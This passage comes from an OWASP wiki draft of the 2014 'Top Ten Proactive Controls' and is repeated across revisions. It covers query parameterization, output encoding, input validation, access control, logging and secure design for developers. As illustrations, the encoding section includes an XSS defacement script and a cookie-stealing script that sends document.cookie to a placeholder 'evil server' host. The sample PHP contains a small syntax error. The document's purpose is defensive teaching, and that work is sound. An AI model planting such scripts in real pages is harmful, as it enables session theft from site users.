Here is an example of query parameterization Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
For more information, please see the [[Query Parameterization Cheat Sheet]].<br />
<br />
== 2) Encoding ==<br />
<br />
A key component of a web application is the user interface. Web developers often build web pages dynamically, consisting of database data that was originally populated with user input. This input should often be considered to be untrusted data and dangerous, which requires special handling when building a secure web application.<br />
<br />
Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in users browsers and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. <br />
<br />
Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding/escaping is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML.<br />
<br />
For more information on stopping XSS in your web application, please visit the OWASP Cross Site Scripting Prevention Cheat Sheet. https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet<br />
<br />
== 3) Validation ==<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types on input validation: “White list validation and blacklist validation”. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively and is not often suggested when initially building a secure web application. The following examples will focus on whitelist validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Also, it's critical to treat all client side data as untrusted. (we need to expand on this)<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation whitelist of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
== 4) Access Control TODO JMANICO ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular resource should be granted or denied. It should be noted that authorization is not equivalent to authentication. These terms and their definitions are frequently confused.<br />
<br />
=== Access Control Issues===<br />
<br />
* Many applications used the "All or Nothing" approach - Once authenticated, all users have equal privileges<br />
* Authorization Logic often relies on Security by Obscurity (STO) by assuming:<br />
* Users will not find unlinked or hidden paths or functionality<br />
* Users will not find and tamper with "obscured" client side parameters (i.e. "hidden" form fields, cookies, etc.)<br />
* Applications with multiple permission levels/roles often increases the possibility of conflicting permission sets resulting in unanticipated privileges<br />
* Many administrative interfaces require only a password for authentication<br />
* Shared accounts combined with a lack of auditing and logging make it extremely difficult to differentiate between malicious and honest administrators<br />
* Administrative interfaces are often not designed as “secure” as user-level interfaces given the assumption that administrators are trusted users<br />
* Authorization/Access Control relies on client-side information (e.g., hidden fields)<br />
* Web and application server processes run as root, Administrator, LOCALSYSTEM or other privileged accounts<br />
* Some web applications access the database via sa or other administrative account (or more privileges than required)<br />
* Some applications implement authorization controls by including a file or web control or code snippet on every page in the application<br />
<input type="text" name="fname" value="Derek"><br />
<input type="text" name="lname" value="Jeter"><br />
<input type="hidden" name="usertype" value="admin"><br />
<br />
=== Access Control Anti-Patterns ===<br />
<br />
* Hard-coded role checks in application code<br />
* Lack of centralized access control logic<br />
* Untrusted data driving access control decisions<br />
* Access control that is "open by default"<br />
* Lack of addressing horizontal access control in a standardized way (if at all)<br />
* Access control logic that needs to be manually added to every endpoint in code<br />
* non-anonymous entry point DO NOT have an access control check<br />
* No authorization check at or near the beginning of code implementing sensitive activities<br />
<br />
For more information on access control, please see the [[Access Control Cheat Sheet]].<br />
<br />
== 5) Identity and Authentication ==<br />
<br />
Authentication is the process of verification that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
For more information, please see the [[Authentication Cheat Sheet]], the [[Password Storage Cheat Sheet]], the [[Forgot Password Cheat Sheet]] and the [[Session Management Cheat Sheet]].<br />
<br />
== 6) Data Protection and Privacy ==<br />
<br />
=== Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
For more information on proper SSL/TLS configuration, please see the [[Transport Layer Protection Cheat Sheet]]. For information on protecting your users from man in the middle attacks via fraudulent SSL certificates, please see the [[Pinning Cheat Sheet]].<br />
<br />
=== Encryption at Rest TODO JMANICO===<br />
<br />
#1 forced to encrypt data via standards like PCI<br />
#2 doing low level crypto by hand leads to bad crypto<br />
#3 user well vetted libraries like KeyCzar<br />
#4 key management a bear<br />
#5 tiering and trust - crypto services vs embedding crypto at the app layer<br />
#6 symmetric/asymmetric encryption<br />
#7 weirdness of password strorage crypto (punt to the CS)<br />
#8 digital signatures<br />
#9 it's also important to ensure sensitive data is not cached in the browser. cache-control settings?<br />
#10 For more information on low level decisions necessary when encrypting data at rest, please see the [[Cryptographic Storage Cheat Sheet]].<br />
<br />
=== Protection in Process ===<br />
<br />
Data can be exposed during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
== 7) Logging, Error Handling and Intrusion Detection TODO JIMBIRD ==<br />
<br />
Application logging should be consistent within the application, consistent across an organization's application portfolio and use industry standards where relevant, so the logged event data can be consumed, correlated, analyzed and managed by a wide variety of systems.<br />
<br />
Application logging should be always be included for security events. Application logs are invaluable data for:<br />
<br />
* Identifying security incidents<br />
* Monitoring policy violations<br />
* Establishing baselines<br />
* Providing information about problems and unusual conditions<br />
* Contributing additional application-specific data for incident investigation which is lacking in other log sources<br />
* Helping defend against vulnerability identification and exploitation through attack detection<br />
<br />
Application logging might also be used to record other types of events too such as:<br />
<br />
* Security events<br />
* Business process monitoring e.g. sales process abandonment, transactions, connections<br />
* Audit trails e.g. data addition, modification and deletion, data exports<br />
* Performance monitoring e.g. data load time, page timeouts<br />
* Compliance monitoring<br />
* Data for subsequent requests for information e.g. data subject access, freedom of information, litigation, police and other regulatory investigations<br />
* Legally sanctioned interception of data e.g application-layer wire-tapping<br />
* Other business-specific requirements<br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCIDSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. It is important not to log too much, or too little. Use knowledge of the intended purposes to guide what, when and how much.<br />
<br />
For more information, please see the [[Logging Cheat Sheet]].<br />
<br />
The AppSensor project defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. For more information please see the [[OWASP AppSensor Project]].<br />
<br />
TODO: Log Injection<br />
<br />
JIM BIRD: Talks about logging of “security events” but doesn’t explain or give examples of what a security event is. Reminder to obey privacy/confidentiality requirements – do not log private/confidential information Maybe should include something brief about protection from log injection (reminder to perform validation/encoding on user input fields that are logged)<br />
<br />
== 8) Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* Spring Security : [http://static.springsource.org/spring-security/site/index.html]<br />
* Apache Shiro : [http://shiro.apache.org/ http://shiro.apache.org/]<br />
* OWASP ESAPI : [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
== 9) Security in Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project. These include:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use-cases which include input, behavior and output, and can be tested for functional correctness by Q/A staff. Functional requirements like re-authentication during change password or a forgot password feature can be reviewed and tested by Q/A staff. <br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features are often multi-step multi-branch workflows that are difficult to evaluate thoroughly, for example eCommerce workflows, shipping route choices, or banking transfer validation. The stories or use cases for these requirements should include failure scenarios (what happens if a step fails or times out or if someone accidentally repeats a step?) and requirements derived from "abuse-cases". Abuse cases describe how the application's functions could be subverted by attackers. Thinking about failures and attack scenarios will uncover weaknesses that need to be addressed to improve the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must be aware of what personal and confidential information needs to be protected and tracked. This will drive the need for access control, encryption and auditing and logging controls in the system.<br />
<br />
== 10) Security in Architecture and Design ==<br />
<br />
Security needs to be considered in the architecture and design of the application.<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team needs to understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls should be enforced in the client, the web layer, the business layer, the data layer, and where you need to establish trust between different systems or different parts of the same system. Understand these trust boundaries: what is inside or outside of a trust boundary, what actors or data can be trusted, what should not be? This determines where you need to make decisions about authentication, access control, data validation and encoding, encryption and logging.<br />
<br />
3) '''Understand the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (whether you should do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
For more information, see the [[Attack Surface Analysis Cheat Sheet]].<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! This project is the comprehensive reference for all OWASP projects and application security in general. All of the materials here are free and open source. <br />
<br />
== Status ==<br />
<br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
= Who are we? =<br />
<br />
Jim Manico jim@owasp.org<br/><br />
Andrew Van Der Stock vanderaj@owasp.org<br/><br />
Stephen de Vries stephen@continuumsecurity.net<br/><br />
Jim Bird jimbird@shaw.ca<br/><br />
<br />
= About =<br />
{{:Projects/OWASP_Proactive_Controls}} <br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=169950OWASP Proactive Controls2014-03-11T19:49:34Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
<center>[[Image:Proactive.png|500px|frameless|architecture]]</center><br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
==Licensing==<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is this? ==<br />
<br />
The OWASP Proactive Controls<br />
<br />
* This document was written by developers for developers, to assist those new to secure development.<br />
<br />
== Email List ==<br />
<br />
[https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List ]<br />
<br />
== Project Leader ==<br />
<br />
Project Leaders:<br/>Jim Manico<br/><br />
Andrew Van Der Stock<br/><br />
Jim Bird<br/><br />
<br/><br />
Contributors: <br/><br />
Stephen de Vries<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== News and Events ==<br />
* [Feb 4 2014] New Wiki Template!<br />
<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [https://creativecommons.org/licenses/by-sa/3.0/us/ CC BY-SA 3.0 US]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
As software developers author the code that makes up a web application, they need to do so in a secure manner. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would like to especially thank Andrew van der Stock for starting this project. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten and one half Proactive Controls 2014. <br />
<br />
== 1) Query Parameterization ==<br />
<br />
SQL Injection is perhaps one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of query parameterization Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
For more information, please see the [[Query Parameterization Cheat Sheet]].<br />
<br />
== 2) Encoding ==<br />
<br />
A key component of a web application is the user interface. Web developers often build web pages dynamically, consisting of database data that was originally populated with user input. This input should often be considered to be untrusted data and dangerous, which requires special handling when building a secure web application.<br />
<br />
Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in users browsers and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. <br />
<br />
Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding/escaping is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML.<br />
<br />
For more information on stopping XSS in your web application, please visit the OWASP Cross Site Scripting Prevention Cheat Sheet. https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet<br />
<br />
== 3) Validation ==<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types on input validation: “White list validation and blacklist validation”. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively and is not often suggested when initially building a secure web application. The following examples will focus on whitelist validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Also, it's critical to treat all client side data as untrusted. (we need to expand on this)<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation whitelist of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
== 4) Access Control TODO JMANICO ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular resource should be granted or denied. It should be noted that authorization is not equivalent to authentication. These terms and their definitions are frequently confused.<br />
<br />
=== Access Control Issues===<br />
<br />
* Many applications used the "All or Nothing" approach - Once authenticated, all users have equal privileges<br />
* Authorization Logic often relies on Security by Obscurity (STO) by assuming:<br />
* Users will not find unlinked or hidden paths or functionality<br />
* Users will not find and tamper with "obscured" client side parameters (i.e. "hidden" form fields, cookies, etc.)<br />
* Applications with multiple permission levels/roles often increases the possibility of conflicting permission sets resulting in unanticipated privileges<br />
* Many administrative interfaces require only a password for authentication<br />
* Shared accounts combined with a lack of auditing and logging make it extremely difficult to differentiate between malicious and honest administrators<br />
* Administrative interfaces are often not designed as “secure” as user-level interfaces given the assumption that administrators are trusted users<br />
* Authorization/Access Control relies on client-side information (e.g., hidden fields)<br />
* Web and application server processes run as root, Administrator, LOCALSYSTEM or other privileged accounts<br />
* Some web applications access the database via sa or other administrative account (or more privileges than required)<br />
* Some applications implement authorization controls by including a file or web control or code snippet on every page in the application<br />
<input type="text" name="fname" value="Derek"><br />
<input type="text" name="lname" value="Jeter"><br />
<input type="hidden" name="usertype" value="admin"><br />
<br />
=== Access Control Anti-Patterns ===<br />
<br />
* Hard-coded role checks in application code<br />
* Lack of centralized access control logic<br />
* Untrusted data driving access control decisions<br />
* Access control that is "open by default"<br />
* Lack of addressing horizontal access control in a standardized way (if at all)<br />
* Access control logic that needs to be manually added to every endpoint in code<br />
* non-anonymous entry point DO NOT have an access control check<br />
* No authorization check at or near the beginning of code implementing sensitive activities<br />
<br />
For more information on access control, please see the [[Access Control Cheat Sheet]].<br />
<br />
== 5) Identity and Authentication ==<br />
<br />
Authentication is the process of verification that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
For more information, please see the [[Authentication Cheat Sheet]], the [[Password Storage Cheat Sheet]], the [[Forgot Password Cheat Sheet]] and the [[Session Management Cheat Sheet]].<br />
<br />
== 6) Data Protection and Privacy ==<br />
<br />
=== Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
For more information on proper SSL/TLS configuration, please see the [[Transport Layer Protection Cheat Sheet]]. For information on protecting your users from man in the middle attacks via fraudulent SSL certificates, please see the [[Pinning Cheat Sheet]].<br />
<br />
=== Encryption at Rest TODO JMANICO===<br />
<br />
#1 forced to encrypt data via standards like PCI<br />
#2 doing low level crypto by hand leads to bad crypto<br />
#3 user well vetted libraries like KeyCzar<br />
#4 key management a bear<br />
#5 tiering and trust - crypto services vs embedding crypto at the app layer<br />
#6 symmetric/asymmetric encryption<br />
#7 weirdness of password strorage crypto (punt to the CS)<br />
#8 digital signatures<br />
#9 it's also important to ensure sensitive data is not cached in the browser. cache-control settings?<br />
#10 For more information on low level decisions necessary when encrypting data at rest, please see the [[Cryptographic Storage Cheat Sheet]].<br />
<br />
=== Protection in Process ===<br />
<br />
Data can be exposed during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
== 7) Logging, Error Handling and Intrusion Detection TODO JIMBIRD ==<br />
<br />
Application logging should be consistent within the application, consistent across an organization's application portfolio and use industry standards where relevant, so the logged event data can be consumed, correlated, analyzed and managed by a wide variety of systems.<br />
<br />
Application logging should be always be included for security events. Application logs are invaluable data for:<br />
<br />
* Identifying security incidents<br />
* Monitoring policy violations<br />
* Establishing baselines<br />
* Providing information about problems and unusual conditions<br />
* Contributing additional application-specific data for incident investigation which is lacking in other log sources<br />
* Helping defend against vulnerability identification and exploitation through attack detection<br />
<br />
Application logging might also be used to record other types of events too such as:<br />
<br />
* Security events<br />
* Business process monitoring e.g. sales process abandonment, transactions, connections<br />
* Audit trails e.g. data addition, modification and deletion, data exports<br />
* Performance monitoring e.g. data load time, page timeouts<br />
* Compliance monitoring<br />
* Data for subsequent requests for information e.g. data subject access, freedom of information, litigation, police and other regulatory investigations<br />
* Legally sanctioned interception of data e.g application-layer wire-tapping<br />
* Other business-specific requirements<br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCIDSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. It is important not to log too much, or too little. Use knowledge of the intended purposes to guide what, when and how much.<br />
<br />
For more information, please see the [[Logging Cheat Sheet]].<br />
<br />
The AppSensor project defines a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application. For more information please see the [[OWASP AppSensor Project]].<br />
<br />
TODO: Log Injection<br />
<br />
JIM BIRD: Talks about logging of “security events” but doesn’t explain or give examples of what a security event is. Reminder to obey privacy/confidentiality requirements – do not log private/confidential information Maybe should include something brief about protection from log injection (reminder to perform validation/encoding on user input fields that are logged)<br />
<br />
== 8) Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* Spring Security : [http://static.springsource.org/spring-security/site/index.html]<br />
* Apache Shiro : [http://shiro.apache.org/ http://shiro.apache.org/]<br />
* OWASP ESAPI : [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
== 9) Security in Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project. These include:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use-cases which include input, behavior and output, and can be tested for functional correctness by Q/A staff. Functional requirements like re-authentication during change password or a forgot password feature can be reviewed and tested by Q/A staff. <br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features are often multi-step multi-branch workflows that are difficult to evaluate thoroughly, for example eCommerce workflows, shipping route choices, or banking transfer validation. The stories or use cases for these requirements should include failure scenarios (what happens if a step fails or times out or if someone accidentally repeats a step?) and requirements derived from "abuse-cases". Abuse cases describe how the application's functions could be subverted by attackers. Thinking about failures and attack scenarios will uncover weaknesses that need to be addressed to improve the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must be aware of what personal and confidential information needs to be protected and tracked. This will drive the need for access control, encryption and auditing and logging controls in the system.<br />
<br />
== 10) Security in Architecture and Design ==<br />
<br />
Security needs to be considered in the architecture and design of the application.<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team needs to understand and manage.<br />
<br />
